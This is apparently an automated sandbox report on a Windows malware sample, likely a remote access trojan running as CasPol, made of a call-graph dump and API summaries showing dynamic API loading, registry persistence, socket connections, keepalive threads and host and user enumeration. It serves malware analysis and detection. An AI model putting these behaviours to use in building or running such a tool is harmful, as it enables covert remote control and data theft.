API calls 46172->46173 46174 41a725 46173->46174 46175 401eea 26 API calls 46174->46175 46176 41a72e 46175->46176 46177 401eea 26 API calls 46176->46177 46177->46155 46179 409536 _wcslen 46178->46179 46180 409541 46179->46180 46181 409558 46179->46181 46183 40c89e 31 API calls 46180->46183 46182 40c89e 31 API calls 46181->46182 46184 409560 46182->46184 46185 409549 46183->46185 46187 401e18 26 API calls 46184->46187 46186 401e18 26 API calls 46185->46186 46202 409553 46186->46202 46188 40956e 46187->46188 46189 401e13 26 API calls 46188->46189 46191 409576 46189->46191 46190 401e13 26 API calls 46192 4095ad 46190->46192 46548 40856b 28 API calls 46191->46548 46533 409837 46192->46533 46195 409588 46549 4028cf 46195->46549 46198 409593 46199 401e18 26 API calls 46198->46199 46200 40959d 46199->46200 46201 401e13 26 API calls 46200->46201 46201->46202 46202->46190 46568 403b40 46203->46568 46207 41a7fd 46208 4028cf 28 API calls 46207->46208 46209 41a807 46208->46209 46210 401e13 26 API calls 46209->46210 46211 41a810 46210->46211 46212 401e13 26 API calls 46211->46212 46213 40dfc3 46212->46213 46213->45940 46215 40e08b 46214->46215 46216 41248f RegQueryValueExA RegCloseKey 46214->46216 46215->45969 46215->45972 46216->46215 46218 4125b0 RegQueryValueExW RegCloseKey 46217->46218 46219 4125dd 46217->46219 46218->46219 46220 403b40 28 API calls 46219->46220 46221 40e0ba 46220->46221 46221->45981 46223 412992 RegDeleteValueW 46222->46223 46224 4129a6 46222->46224 46223->46224 46225 4129a2 46223->46225 46224->45990 46225->45990 46227 40cbc5 46226->46227 46228 41246e 3 API calls 46227->46228 46229 40cbcc 46228->46229 46233 40cbeb 46229->46233 46601 401602 46229->46601 46231 40cbd9 46604 4127d5 RegCreateKeyA 46231->46604 46234 413fd4 46233->46234 46235 413feb 46234->46235 46621 41aa73 46235->46621 46237 413ff6 46238 401d64 28 API calls 46237->46238 46239 41400f 46238->46239 46240 43a5e7 42 API calls 46239->46240 46241 41401c 46240->46241 46242 414021 Sleep 46241->46242 46243 41402e 46241->46243 46242->46243 46244 401f66 28 API calls 46243->46244 46245 41403d 46244->46245 46246 401d64 28 API calls 46245->46246 46247 41404b 46246->46247 46248 401fbd 28 API calls 46247->46248 46249 414053 46248->46249 46250 41afc3 28 API calls 46249->46250 46251 41405b 46250->46251 46625 404262 WSAStartup 46251->46625 46253 414065 46254 401d64 28 API calls 46253->46254 46255 41406e 46254->46255 46256 401d64 28 API calls 46255->46256 46296 4140ed 46255->46296 46257 414087 46256->46257 46260 401d64 28 API calls 46257->46260 46258 401d64 28 API calls 46258->46296 46259 401fbd 28 API calls 46259->46296 46261 414098 46260->46261 46263 401d64 28 API calls 46261->46263 46262 41afc3 28 API calls 46262->46296 46264 4140a9 46263->46264 46266 401d64 28 API calls 46264->46266 46265 4085b4 28 API calls 46265->46296 46267 4140ba 46266->46267 46269 401d64 28 API calls 46267->46269 46268 401eef 26 API calls 46268->46296 46270 4140cb 46269->46270 46272 401d64 28 API calls 46270->46272 46271 401eea 26 API calls 46271->46296 46273 4140dd 46272->46273 46727 404101 87 API calls 46273->46727 46276 414244 WSAGetLastError 46728 41bc76 30 API calls 46276->46728 46282 41a686 79 API calls 46282->46296 46284 404cbf 28 API calls 46284->46296 46285 401d8c 26 API calls 46285->46296 46286 43a5e7 42 API calls 46288 414b80 Sleep 46286->46288 46287 405ce6 28 API calls 46287->46296 46288->46296 46289 4027cb 28 API calls 46289->46296 46290 401f66 28 API calls 46290->46296 46295 412513 31 API calls 46295->46296 46296->46258 46296->46259 46296->46262 46296->46265 46296->46268 46296->46271 46296->46276 46296->46282 46296->46284 46296->46285 46296->46286 46296->46287 46296->46289 46296->46290 46296->46295 46313 41446f 46296->46313 46626 413f9a 46296->46626 46631 4041f1 46296->46631 46638 404915 46296->46638 46653 40428c connect 46296->46653 46713 4047eb WaitForSingleObject 46296->46713 46729 404c9e 28 API calls 46296->46729 46730 413683 50 API calls 46296->46730 46731 4082dc 28 API calls 46296->46731 46732 440c51 26 API calls 46296->46732 46733 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46296->46733 46297 403b40 28 API calls 46297->46313 46300 401d64 28 API calls 46301 4144ed GetTickCount 46300->46301 46736 41ad46 28 API calls 46301->46736 46304 41ad46 28 API calls 46304->46313 46307 41aec8 28 API calls 46307->46313 46309 40275c 28 API calls 46309->46313 46310 405ce6 28 API calls 46310->46313 46311 4027cb 28 API calls 46311->46313 46313->46296 46313->46297 46313->46300 46313->46304 46313->46307 46313->46309 46313->46310 46313->46311 46314 401eea 26 API calls 46313->46314 46315 401e13 26 API calls 46313->46315 46318 401f66 28 API calls 46313->46318 46319 41a686 79 API calls 46313->46319 46320 414b22 CreateThread 46313->46320 46734 40cbf1 6 API calls 46313->46734 46735 41adee 28 API calls 46313->46735 46737 41aca0 GetTickCount 46313->46737 46738 41ac52 30 API calls ___scrt_fastfail 46313->46738 46739 40e679 29 API calls 46313->46739 46740 4027ec 28 API calls 46313->46740 46741 404468 59 API calls _Yarn 46313->46741 46742 4045d5 111 API calls ___std_exception_copy 46313->46742 46743 40a767 84 API calls 46313->46743 46314->46313 46315->46313 46318->46313 46319->46313 46320->46313 46768 419e89 102 API calls 46320->46768 46321->45740 46322->45749 46325 4085c0 46324->46325 46326 402e78 28 API calls 46325->46326 46327 4085e4 46326->46327 46327->45771 46329 4124e1 RegQueryValueExA RegCloseKey 46328->46329 46330 41250b 46328->46330 46329->46330 46330->45767 46331->45774 46332->45803 46333->45797 46334->45787 46335->45801 46337 40c8ba 46336->46337 46338 40c8da 46337->46338 46339 40c90f 46337->46339 46343 40c8d0 46337->46343 46769 41a74b 29 API calls 46338->46769 46342 41b15b GetCurrentProcess 46339->46342 46341 40ca03 GetLongPathNameW 46345 403b40 28 API calls 46341->46345 46346 40c914 46342->46346 46343->46341 46344 40c8e3 46347 401e18 26 API calls 46344->46347 46348 40ca18 46345->46348 46349 40c918 46346->46349 46350 40c96a 46346->46350 46352 40c8ed 46347->46352 46353 403b40 28 API calls 46348->46353 46351 403b40 28 API calls 46349->46351 46354 403b40 28 API calls 46350->46354 46356 40c926 46351->46356 46358 401e13 26 API calls 46352->46358 46357 40ca27 46353->46357 46355 40c978 46354->46355 46362 403b40 28 API calls 46355->46362 46363 403b40 28 API calls 46356->46363 46772 40cc37 28 API calls 46357->46772 46358->46343 46360 40ca3a 46773 402860 28 API calls 46360->46773 46365 40c98e 46362->46365 46366 40c93c 46363->46366 46364 40ca45 46774 402860 28 API calls 46364->46774 46771 402860 28 API calls 46365->46771 46770 402860 28 API calls 46366->46770 46370 40ca4f 46373 401e13 26 API calls 46370->46373 46371 40c999 46374 401e18 26 API calls 46371->46374 46372 40c947 46375 401e18 26 API calls 46372->46375 46376 40ca59 46373->46376 46377 40c9a4 46374->46377 46378 40c952 46375->46378 46379 401e13 26 API calls 46376->46379 46380 401e13 26 API calls 46377->46380 46381 401e13 26 API calls 46378->46381 46382 40ca62 46379->46382 46383 40c9ad 46380->46383 46384 40c95b 46381->46384 46385 401e13 26 API calls 46382->46385 46386 401e13 26 API calls 46383->46386 46387 401e13 26 API calls 46384->46387 46388 40ca6b 46385->46388 46386->46352 46387->46352 46389 401e13 26 API calls 46388->46389 46390 40ca74 46389->46390 46391 401e13 26 API calls 46390->46391 46392 40ca7d 46391->46392 46392->45849 46393->45861 46394->45882 46395->45842 46396->45875 46397->45911 46398->45921 46399->45945 46400->45933 46401->45966 46403 401e0c 46402->46403 46404->45794 46407 40e183 46406->46407 46408 41a65c LoadResource LockResource SizeofResource 46406->46408 46409 43a88c 46407->46409 46408->46407 46410 446aff 46409->46410 46411 446b3d 46410->46411 46412 446b28 HeapAlloc 46410->46412 46416 446b11 _strftime 46410->46416 46426 445354 20 API calls __dosmaperr 46411->46426 46414 446b3b 46412->46414 46412->46416 46415 446b42 46414->46415 46415->46024 46416->46411 46416->46412 46425 442200 7 API calls 2 library calls 46416->46425 46419 401f8e 46418->46419 46427 402325 46419->46427 46421 401fa4 46421->46027 46423 401f86 28 API calls 46422->46423 46424 406066 46423->46424 46424->46034 46425->46416 46426->46415 46428 40232f 46427->46428 46430 40233a 46428->46430 46431 40294a 28 API calls 46428->46431 46430->46421 46431->46430 46433 40250d 46432->46433 46434 40252b 46433->46434 46436 40261a 28 API calls 46433->46436 46434->46038 46436->46434 46437->46040 46438->46040 46439->46049 46440->46059 46441->46063 46442->46067 46443->46069 46446 402e85 46445->46446 46447 402e98 46446->46447 46449 402ea9 46446->46449 46450 402eae 46446->46450 46452 403445 28 API calls 46447->46452 46449->46078 46450->46449 46453 40225b 26 API calls 46450->46453 46452->46449 46453->46449 46455 404bd0 46454->46455 46458 40245c 46455->46458 46457 404be4 46457->46081 46459 402469 46458->46459 46461 402478 46459->46461 46462 402ad3 28 API calls 46459->46462 46461->46457 46462->46461 46463->46085 46464->46088 46466 401e94 46465->46466 46468 41a471 46467->46468 46469 41b168 GetCurrentProcess 46467->46469 46470 412513 RegOpenKeyExA 46468->46470 46469->46468 46471 412541 RegQueryValueExA RegCloseKey 46470->46471 46472 412569 46470->46472 46471->46472 46473 401f66 28 API calls 46472->46473 46474 41257e 46473->46474 46474->46102 46475->46110 46477 40b02f 46476->46477 46480 40b04b 46477->46480 46479 40b045 46479->46121 46481 40b055 46480->46481 46483 40b060 46481->46483 46484 40b138 28 API calls 46481->46484 46483->46479 46484->46483 46485->46125 46486->46127 46488 40230d 46487->46488 46489 402325 28 API calls 46488->46489 46490 401f80 46489->46490 46490->45854 46509 43a545 46491->46509 46493 43998b 46518 4392de 38 API calls 3 library calls 46493->46518 46495 439950 46495->46493 46496 439965 46495->46496 46508 40dd54 46495->46508 46516 445354 20 API calls __dosmaperr 46496->46516 46498 43996a 46517 43a827 26 API calls _Deallocate 46498->46517 46501 439997 46502 4399c6 46501->46502 46519 43a58a 42 API calls __Toupper 46501->46519 46503 439a32 46502->46503 46520 43a4f1 26 API calls 2 library calls 46502->46520 46521 43a4f1 26 API calls 2 library calls 46503->46521 46506 439af9 _swprintf 46506->46508 46522 445354 20 API calls __dosmaperr 46506->46522 46508->45869 46508->45871 46510 43a54a 46509->46510 46511 43a55d 46509->46511 46523 445354 20 API calls __dosmaperr 46510->46523 46511->46495 46513 43a54f 46524 43a827 26 API calls _Deallocate 46513->46524 46515 43a55a 46515->46495 46516->46498 46517->46508 46518->46501 46519->46501 46520->46503 46521->46506 46522->46508 46523->46513 46524->46515 46529 401e9b 46525->46529 46527 4027d9 46527->46166 46528->46170 46530 401ea7 46529->46530 46531 40245c 28 API calls 46530->46531 46532 401eb9 46531->46532 46532->46527 46534 409855 46533->46534 46535 4124b7 3 API calls 46534->46535 46536 40985c 46535->46536 46537 409870 46536->46537 46538 40988a 46536->46538 46539 4095cf 46537->46539 46540 409875 46537->46540 46554 4082dc 28 API calls 46538->46554 46539->45906 46552 4082dc 28 API calls 46540->46552 46543 409898 46555 4098a5 85 API calls 46543->46555 46544 409883 46553 409959 29 API calls 46544->46553 46547 409888 46547->46539 46548->46195 46559 402d8b 46549->46559 46551 4028dd 46551->46198 46552->46544 46553->46547 46556 40999f 129 API calls 46553->46556 46554->46543 46555->46539 46557 4099b5 52 API calls 46555->46557 46558 4099a9 124 API calls 46555->46558 46560 402d97 46559->46560 46563 4030f7 46560->46563 46562 402dab 46562->46551 46564 403101 46563->46564 46566 403115 46564->46566 46567 4036c2 28 API calls 46564->46567 46566->46562 46567->46566 46569 403b48 46568->46569 46575 403b7a 46569->46575 46572 403cbb 46584 403dc2 46572->46584 46574 403cc9 46574->46207 46576 403b86 46575->46576 46579 403b9e 46576->46579 46578 403b5a 46578->46572 46580 403ba8 46579->46580 46582 403bb3 46580->46582 46583 403cfd 28 API calls 46580->46583 46582->46578 46583->46582 46585 403dce 46584->46585 46588 402ffd 46585->46588 46587 403de3 46587->46574 46589 40300e 46588->46589 46594 4032a4 46589->46594 46593 40302e 46593->46587 46595 4032b0 46594->46595 46596 40301a 46594->46596 46600 4032b6 28 API calls 46595->46600 46596->46593 46599 4035e8 28 API calls 46596->46599 46599->46593 46607 4395ba 46601->46607 46605 412814 46604->46605 46606 4127ed RegSetValueExA RegCloseKey 46604->46606 46605->46233 46606->46605 46610 43953b 46607->46610 46609 401608 46609->46231 46611 43954a 46610->46611 46613 43955e 46610->46613 46618 445354 20 API calls __dosmaperr 46611->46618 46616 43955a __alldvrm 46613->46616 46620 447601 11 API calls 2 library calls 46613->46620 46615 43954f 46619 43a827 26 API calls _Deallocate 46615->46619 46616->46609 46618->46615 46619->46616 46620->46616 46622 41aab9 _Yarn ___scrt_fastfail 46621->46622 46623 401f66 28 API calls 46622->46623 46624 41ab2e 46623->46624 46624->46237 46625->46253 46627 413fb3 getaddrinfo WSASetLastError 46626->46627 46628 413fa9 46626->46628 46627->46296 46744 413e37 35 API calls ___std_exception_copy 46628->46744 46630 413fae 46630->46627 46632 404206 socket 46631->46632 46633 4041fd 46631->46633 46635 404220 46632->46635 46636 404224 CreateEventW 46632->46636 46745 404262 WSAStartup 46633->46745 46635->46296 46636->46296 46637 404202 46637->46632 46637->46635 46639 4049b1 46638->46639 46641 40492a 46638->46641 46639->46296 46640 404933 46642 404987 CreateEventA CreateThread 46640->46642 46641->46640 46641->46642 46643 404942 GetLocalTime 46641->46643 46642->46639 46748 404b1d 46642->46748 46746 41ad46 28 API calls 46643->46746 46645 40495b 46747 404c9e 28 API calls 46645->46747 46647 404968 46648 401f66 28 API calls 46647->46648 46649 404977 46648->46649 46650 41a686 79 API calls 46649->46650 46651 40497c 46650->46651 46652 401eea 26 API calls 46651->46652 46652->46642 46654 4043e1 46653->46654 46655 4042b3 46653->46655 46656 4043e7 WSAGetLastError 46654->46656 46657 404343 46654->46657 46655->46657 46659 404cbf 28 API calls 46655->46659 46677 4042e8 46655->46677 46656->46657 46658 4043f7 46656->46658 46657->46296 46660 4042f7 46658->46660 46661 4043fc 46658->46661 46663 4042d4 46659->46663 46666 401f66 28 API calls 46660->46666 46763 41bc76 30 API calls 46661->46763 46667 401f66 28 API calls 46663->46667 46665 4042f0 46665->46660 46672 404306 46665->46672 46669 404448 46666->46669 46670 4042e3 46667->46670 46668 40440b 46764 404c9e 28 API calls 46668->46764 46673 401f66 28 API calls 46669->46673 46674 41a686 79 API calls 46670->46674 46679 404315 46672->46679 46680 40434c 46672->46680 46676 404457 46673->46676 46674->46677 46675 404418 46678 401f66 28 API calls 46675->46678 46681 41a686 79 API calls 46676->46681 46752 420151 27 API calls 46677->46752 46682 404427 46678->46682 46684 401f66 28 API calls 46679->46684 46760 420f34 55 API calls 46680->46760 46681->46657 46686 41a686 79 API calls 46682->46686 46685 404324 46684->46685 46688 401f66 28 API calls 46685->46688 46689 40442c 46686->46689 46687 404354 46690 404389 46687->46690 46691 404359 46687->46691 46692 404333 46688->46692 46694 401eea 26 API calls 46689->46694 46762 4202ea 28 API calls 46690->46762 46695 401f66 28 API calls 46691->46695 46696 41a686 79 API calls 46692->46696 46694->46657 46698 404368 46695->46698 46699 404338 46696->46699 46697 404391 46700 4043be CreateEventW CreateEventW 46697->46700 46702 401f66 28 API calls 46697->46702 46701 401f66 28 API calls 46698->46701 46753 420191 46699->46753 46700->46657 46703 404377 46701->46703 46706 4043a7 46702->46706 46704 41a686 79 API calls 46703->46704 46707 40437c 46704->46707 46708 401f66 28 API calls 46706->46708 46761 420592 53 API calls 46707->46761 46710 4043b6 46708->46710 46711 41a686 79 API calls 46710->46711 46712 4043bb 46711->46712 46712->46700 46714 404805 SetEvent CloseHandle 46713->46714 46715 40481c closesocket 46713->46715 46716 40489c 46714->46716 46717 404829 46715->46717 46716->46296 46718 404838 46717->46718 46719 40483f 46717->46719 46767 404ab1 83 API calls 46718->46767 46721 404851 WaitForSingleObject 46719->46721 46722 404892 SetEvent CloseHandle 46719->46722 46723 420191 3 API calls 46721->46723 46722->46716 46724 404860 SetEvent WaitForSingleObject 46723->46724 46725 420191 3 API calls 46724->46725 46726 404878 SetEvent CloseHandle CloseHandle 46725->46726 46726->46722 46727->46296 46728->46296 46729->46296 46730->46296 46731->46296 46732->46296 46733->46296 46734->46313 46735->46313 46736->46313 46737->46313 46738->46313 46739->46313 46740->46313 46741->46313 46742->46313 46743->46313 46744->46630 46745->46637 46746->46645 46747->46647 46751 404b29 101 API calls 46748->46751 46750 404b26 46751->46750 46752->46665 46754 41dc15 46753->46754 46755 420199 46753->46755 46756 41dc23 46754->46756 46765 41cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46754->46765 46755->46657 46766 41d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46756->46766 46759 41dc2a 46760->46687 46761->46699 46762->46697 46763->46668 46764->46675 46765->46756 46766->46759 46767->46719 46769->46344 46770->46372 46771->46371 46772->46360 46773->46364 46774->46370 46777 40e56a 46775->46777 46776 4124b7 3 API calls 46776->46777 46777->46776 46778 40e60e 46777->46778 46781 40e5fe Sleep 46777->46781 46785 40e59c 46777->46785 46811 4082dc 28 API calls 46778->46811 46781->46777 46782 41ae08 28 API calls 46782->46785 46783 40e619 46786 41ae08 28 API calls 46783->46786 46785->46781 46785->46782 46790 401e13 26 API calls 46785->46790 46793 401f66 28 API calls 46785->46793 46797 4126d2 29 API calls 46785->46797 46808 40bf04 73 API calls ___scrt_fastfail 46785->46808 46809 4082dc 28 API calls 46785->46809 46810 412774 29 API calls 46785->46810 46788 40e625 46786->46788 46812 412774 29 API calls 46788->46812 46790->46785 46791 40e638 46792 401e13 26 API calls 46791->46792 46794 40e644 46792->46794 46793->46785 46795 401f66 28 API calls 46794->46795 46796 40e655 46795->46796 46798 4126d2 29 API calls 46796->46798 46797->46785 46799 40e668 46798->46799 46813 411699 TerminateProcess WaitForSingleObject 46799->46813 46801 40e670 ExitProcess 46814 411637 60 API calls 46802->46814 46809->46785 46810->46785 46811->46783 46812->46791 46813->46801

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                              • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleLibraryLoadModule
                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                              • API String ID: 384173800-625181639
                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                              • API String ID: 2281282204-3981147832
                                                                              • Opcode ID: d0b700c6543029a90e3e86d7f1c8fe1d49ffd33392616e1de0625f56461d18dd
                                                                              • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                              • Opcode Fuzzy Hash: d0b700c6543029a90e3e86d7f1c8fe1d49ffd33392616e1de0625f56461d18dd
                                                                              • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1179 404915-404924 1180 4049b1 1179->1180 1181 40492a-404931 1179->1181 1182 4049b3-4049b7 1180->1182 1183 404933-404937 1181->1183 1184 404939-404940 1181->1184 1185 404987-4049af CreateEventA CreateThread 1183->1185 1184->1185 1186 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1184->1186 1185->1182 1186->1185
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                              Strings
                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$EventLocalThreadTime
                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                              • API String ID: 2532271599-1507639952
                                                                              • Opcode ID: 99c7677557354231c88b4d57898418f8e8d9318d7f2a86bda15906334fb82310
                                                                              • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                              • Opcode Fuzzy Hash: 99c7677557354231c88b4d57898418f8e8d9318d7f2a86bda15906334fb82310
                                                                              • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                              APIs
                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                              • String ID:
                                                                              • API String ID: 1815803762-0
                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                              APIs
                                                                              • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Name$ComputerUser
                                                                              • String ID:
                                                                              • API String ID: 4229901323-0
                                                                              • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                              • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: recv
                                                                              • String ID:
                                                                              • API String ID: 1507349165-0
                                                                              • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                              • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                              • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
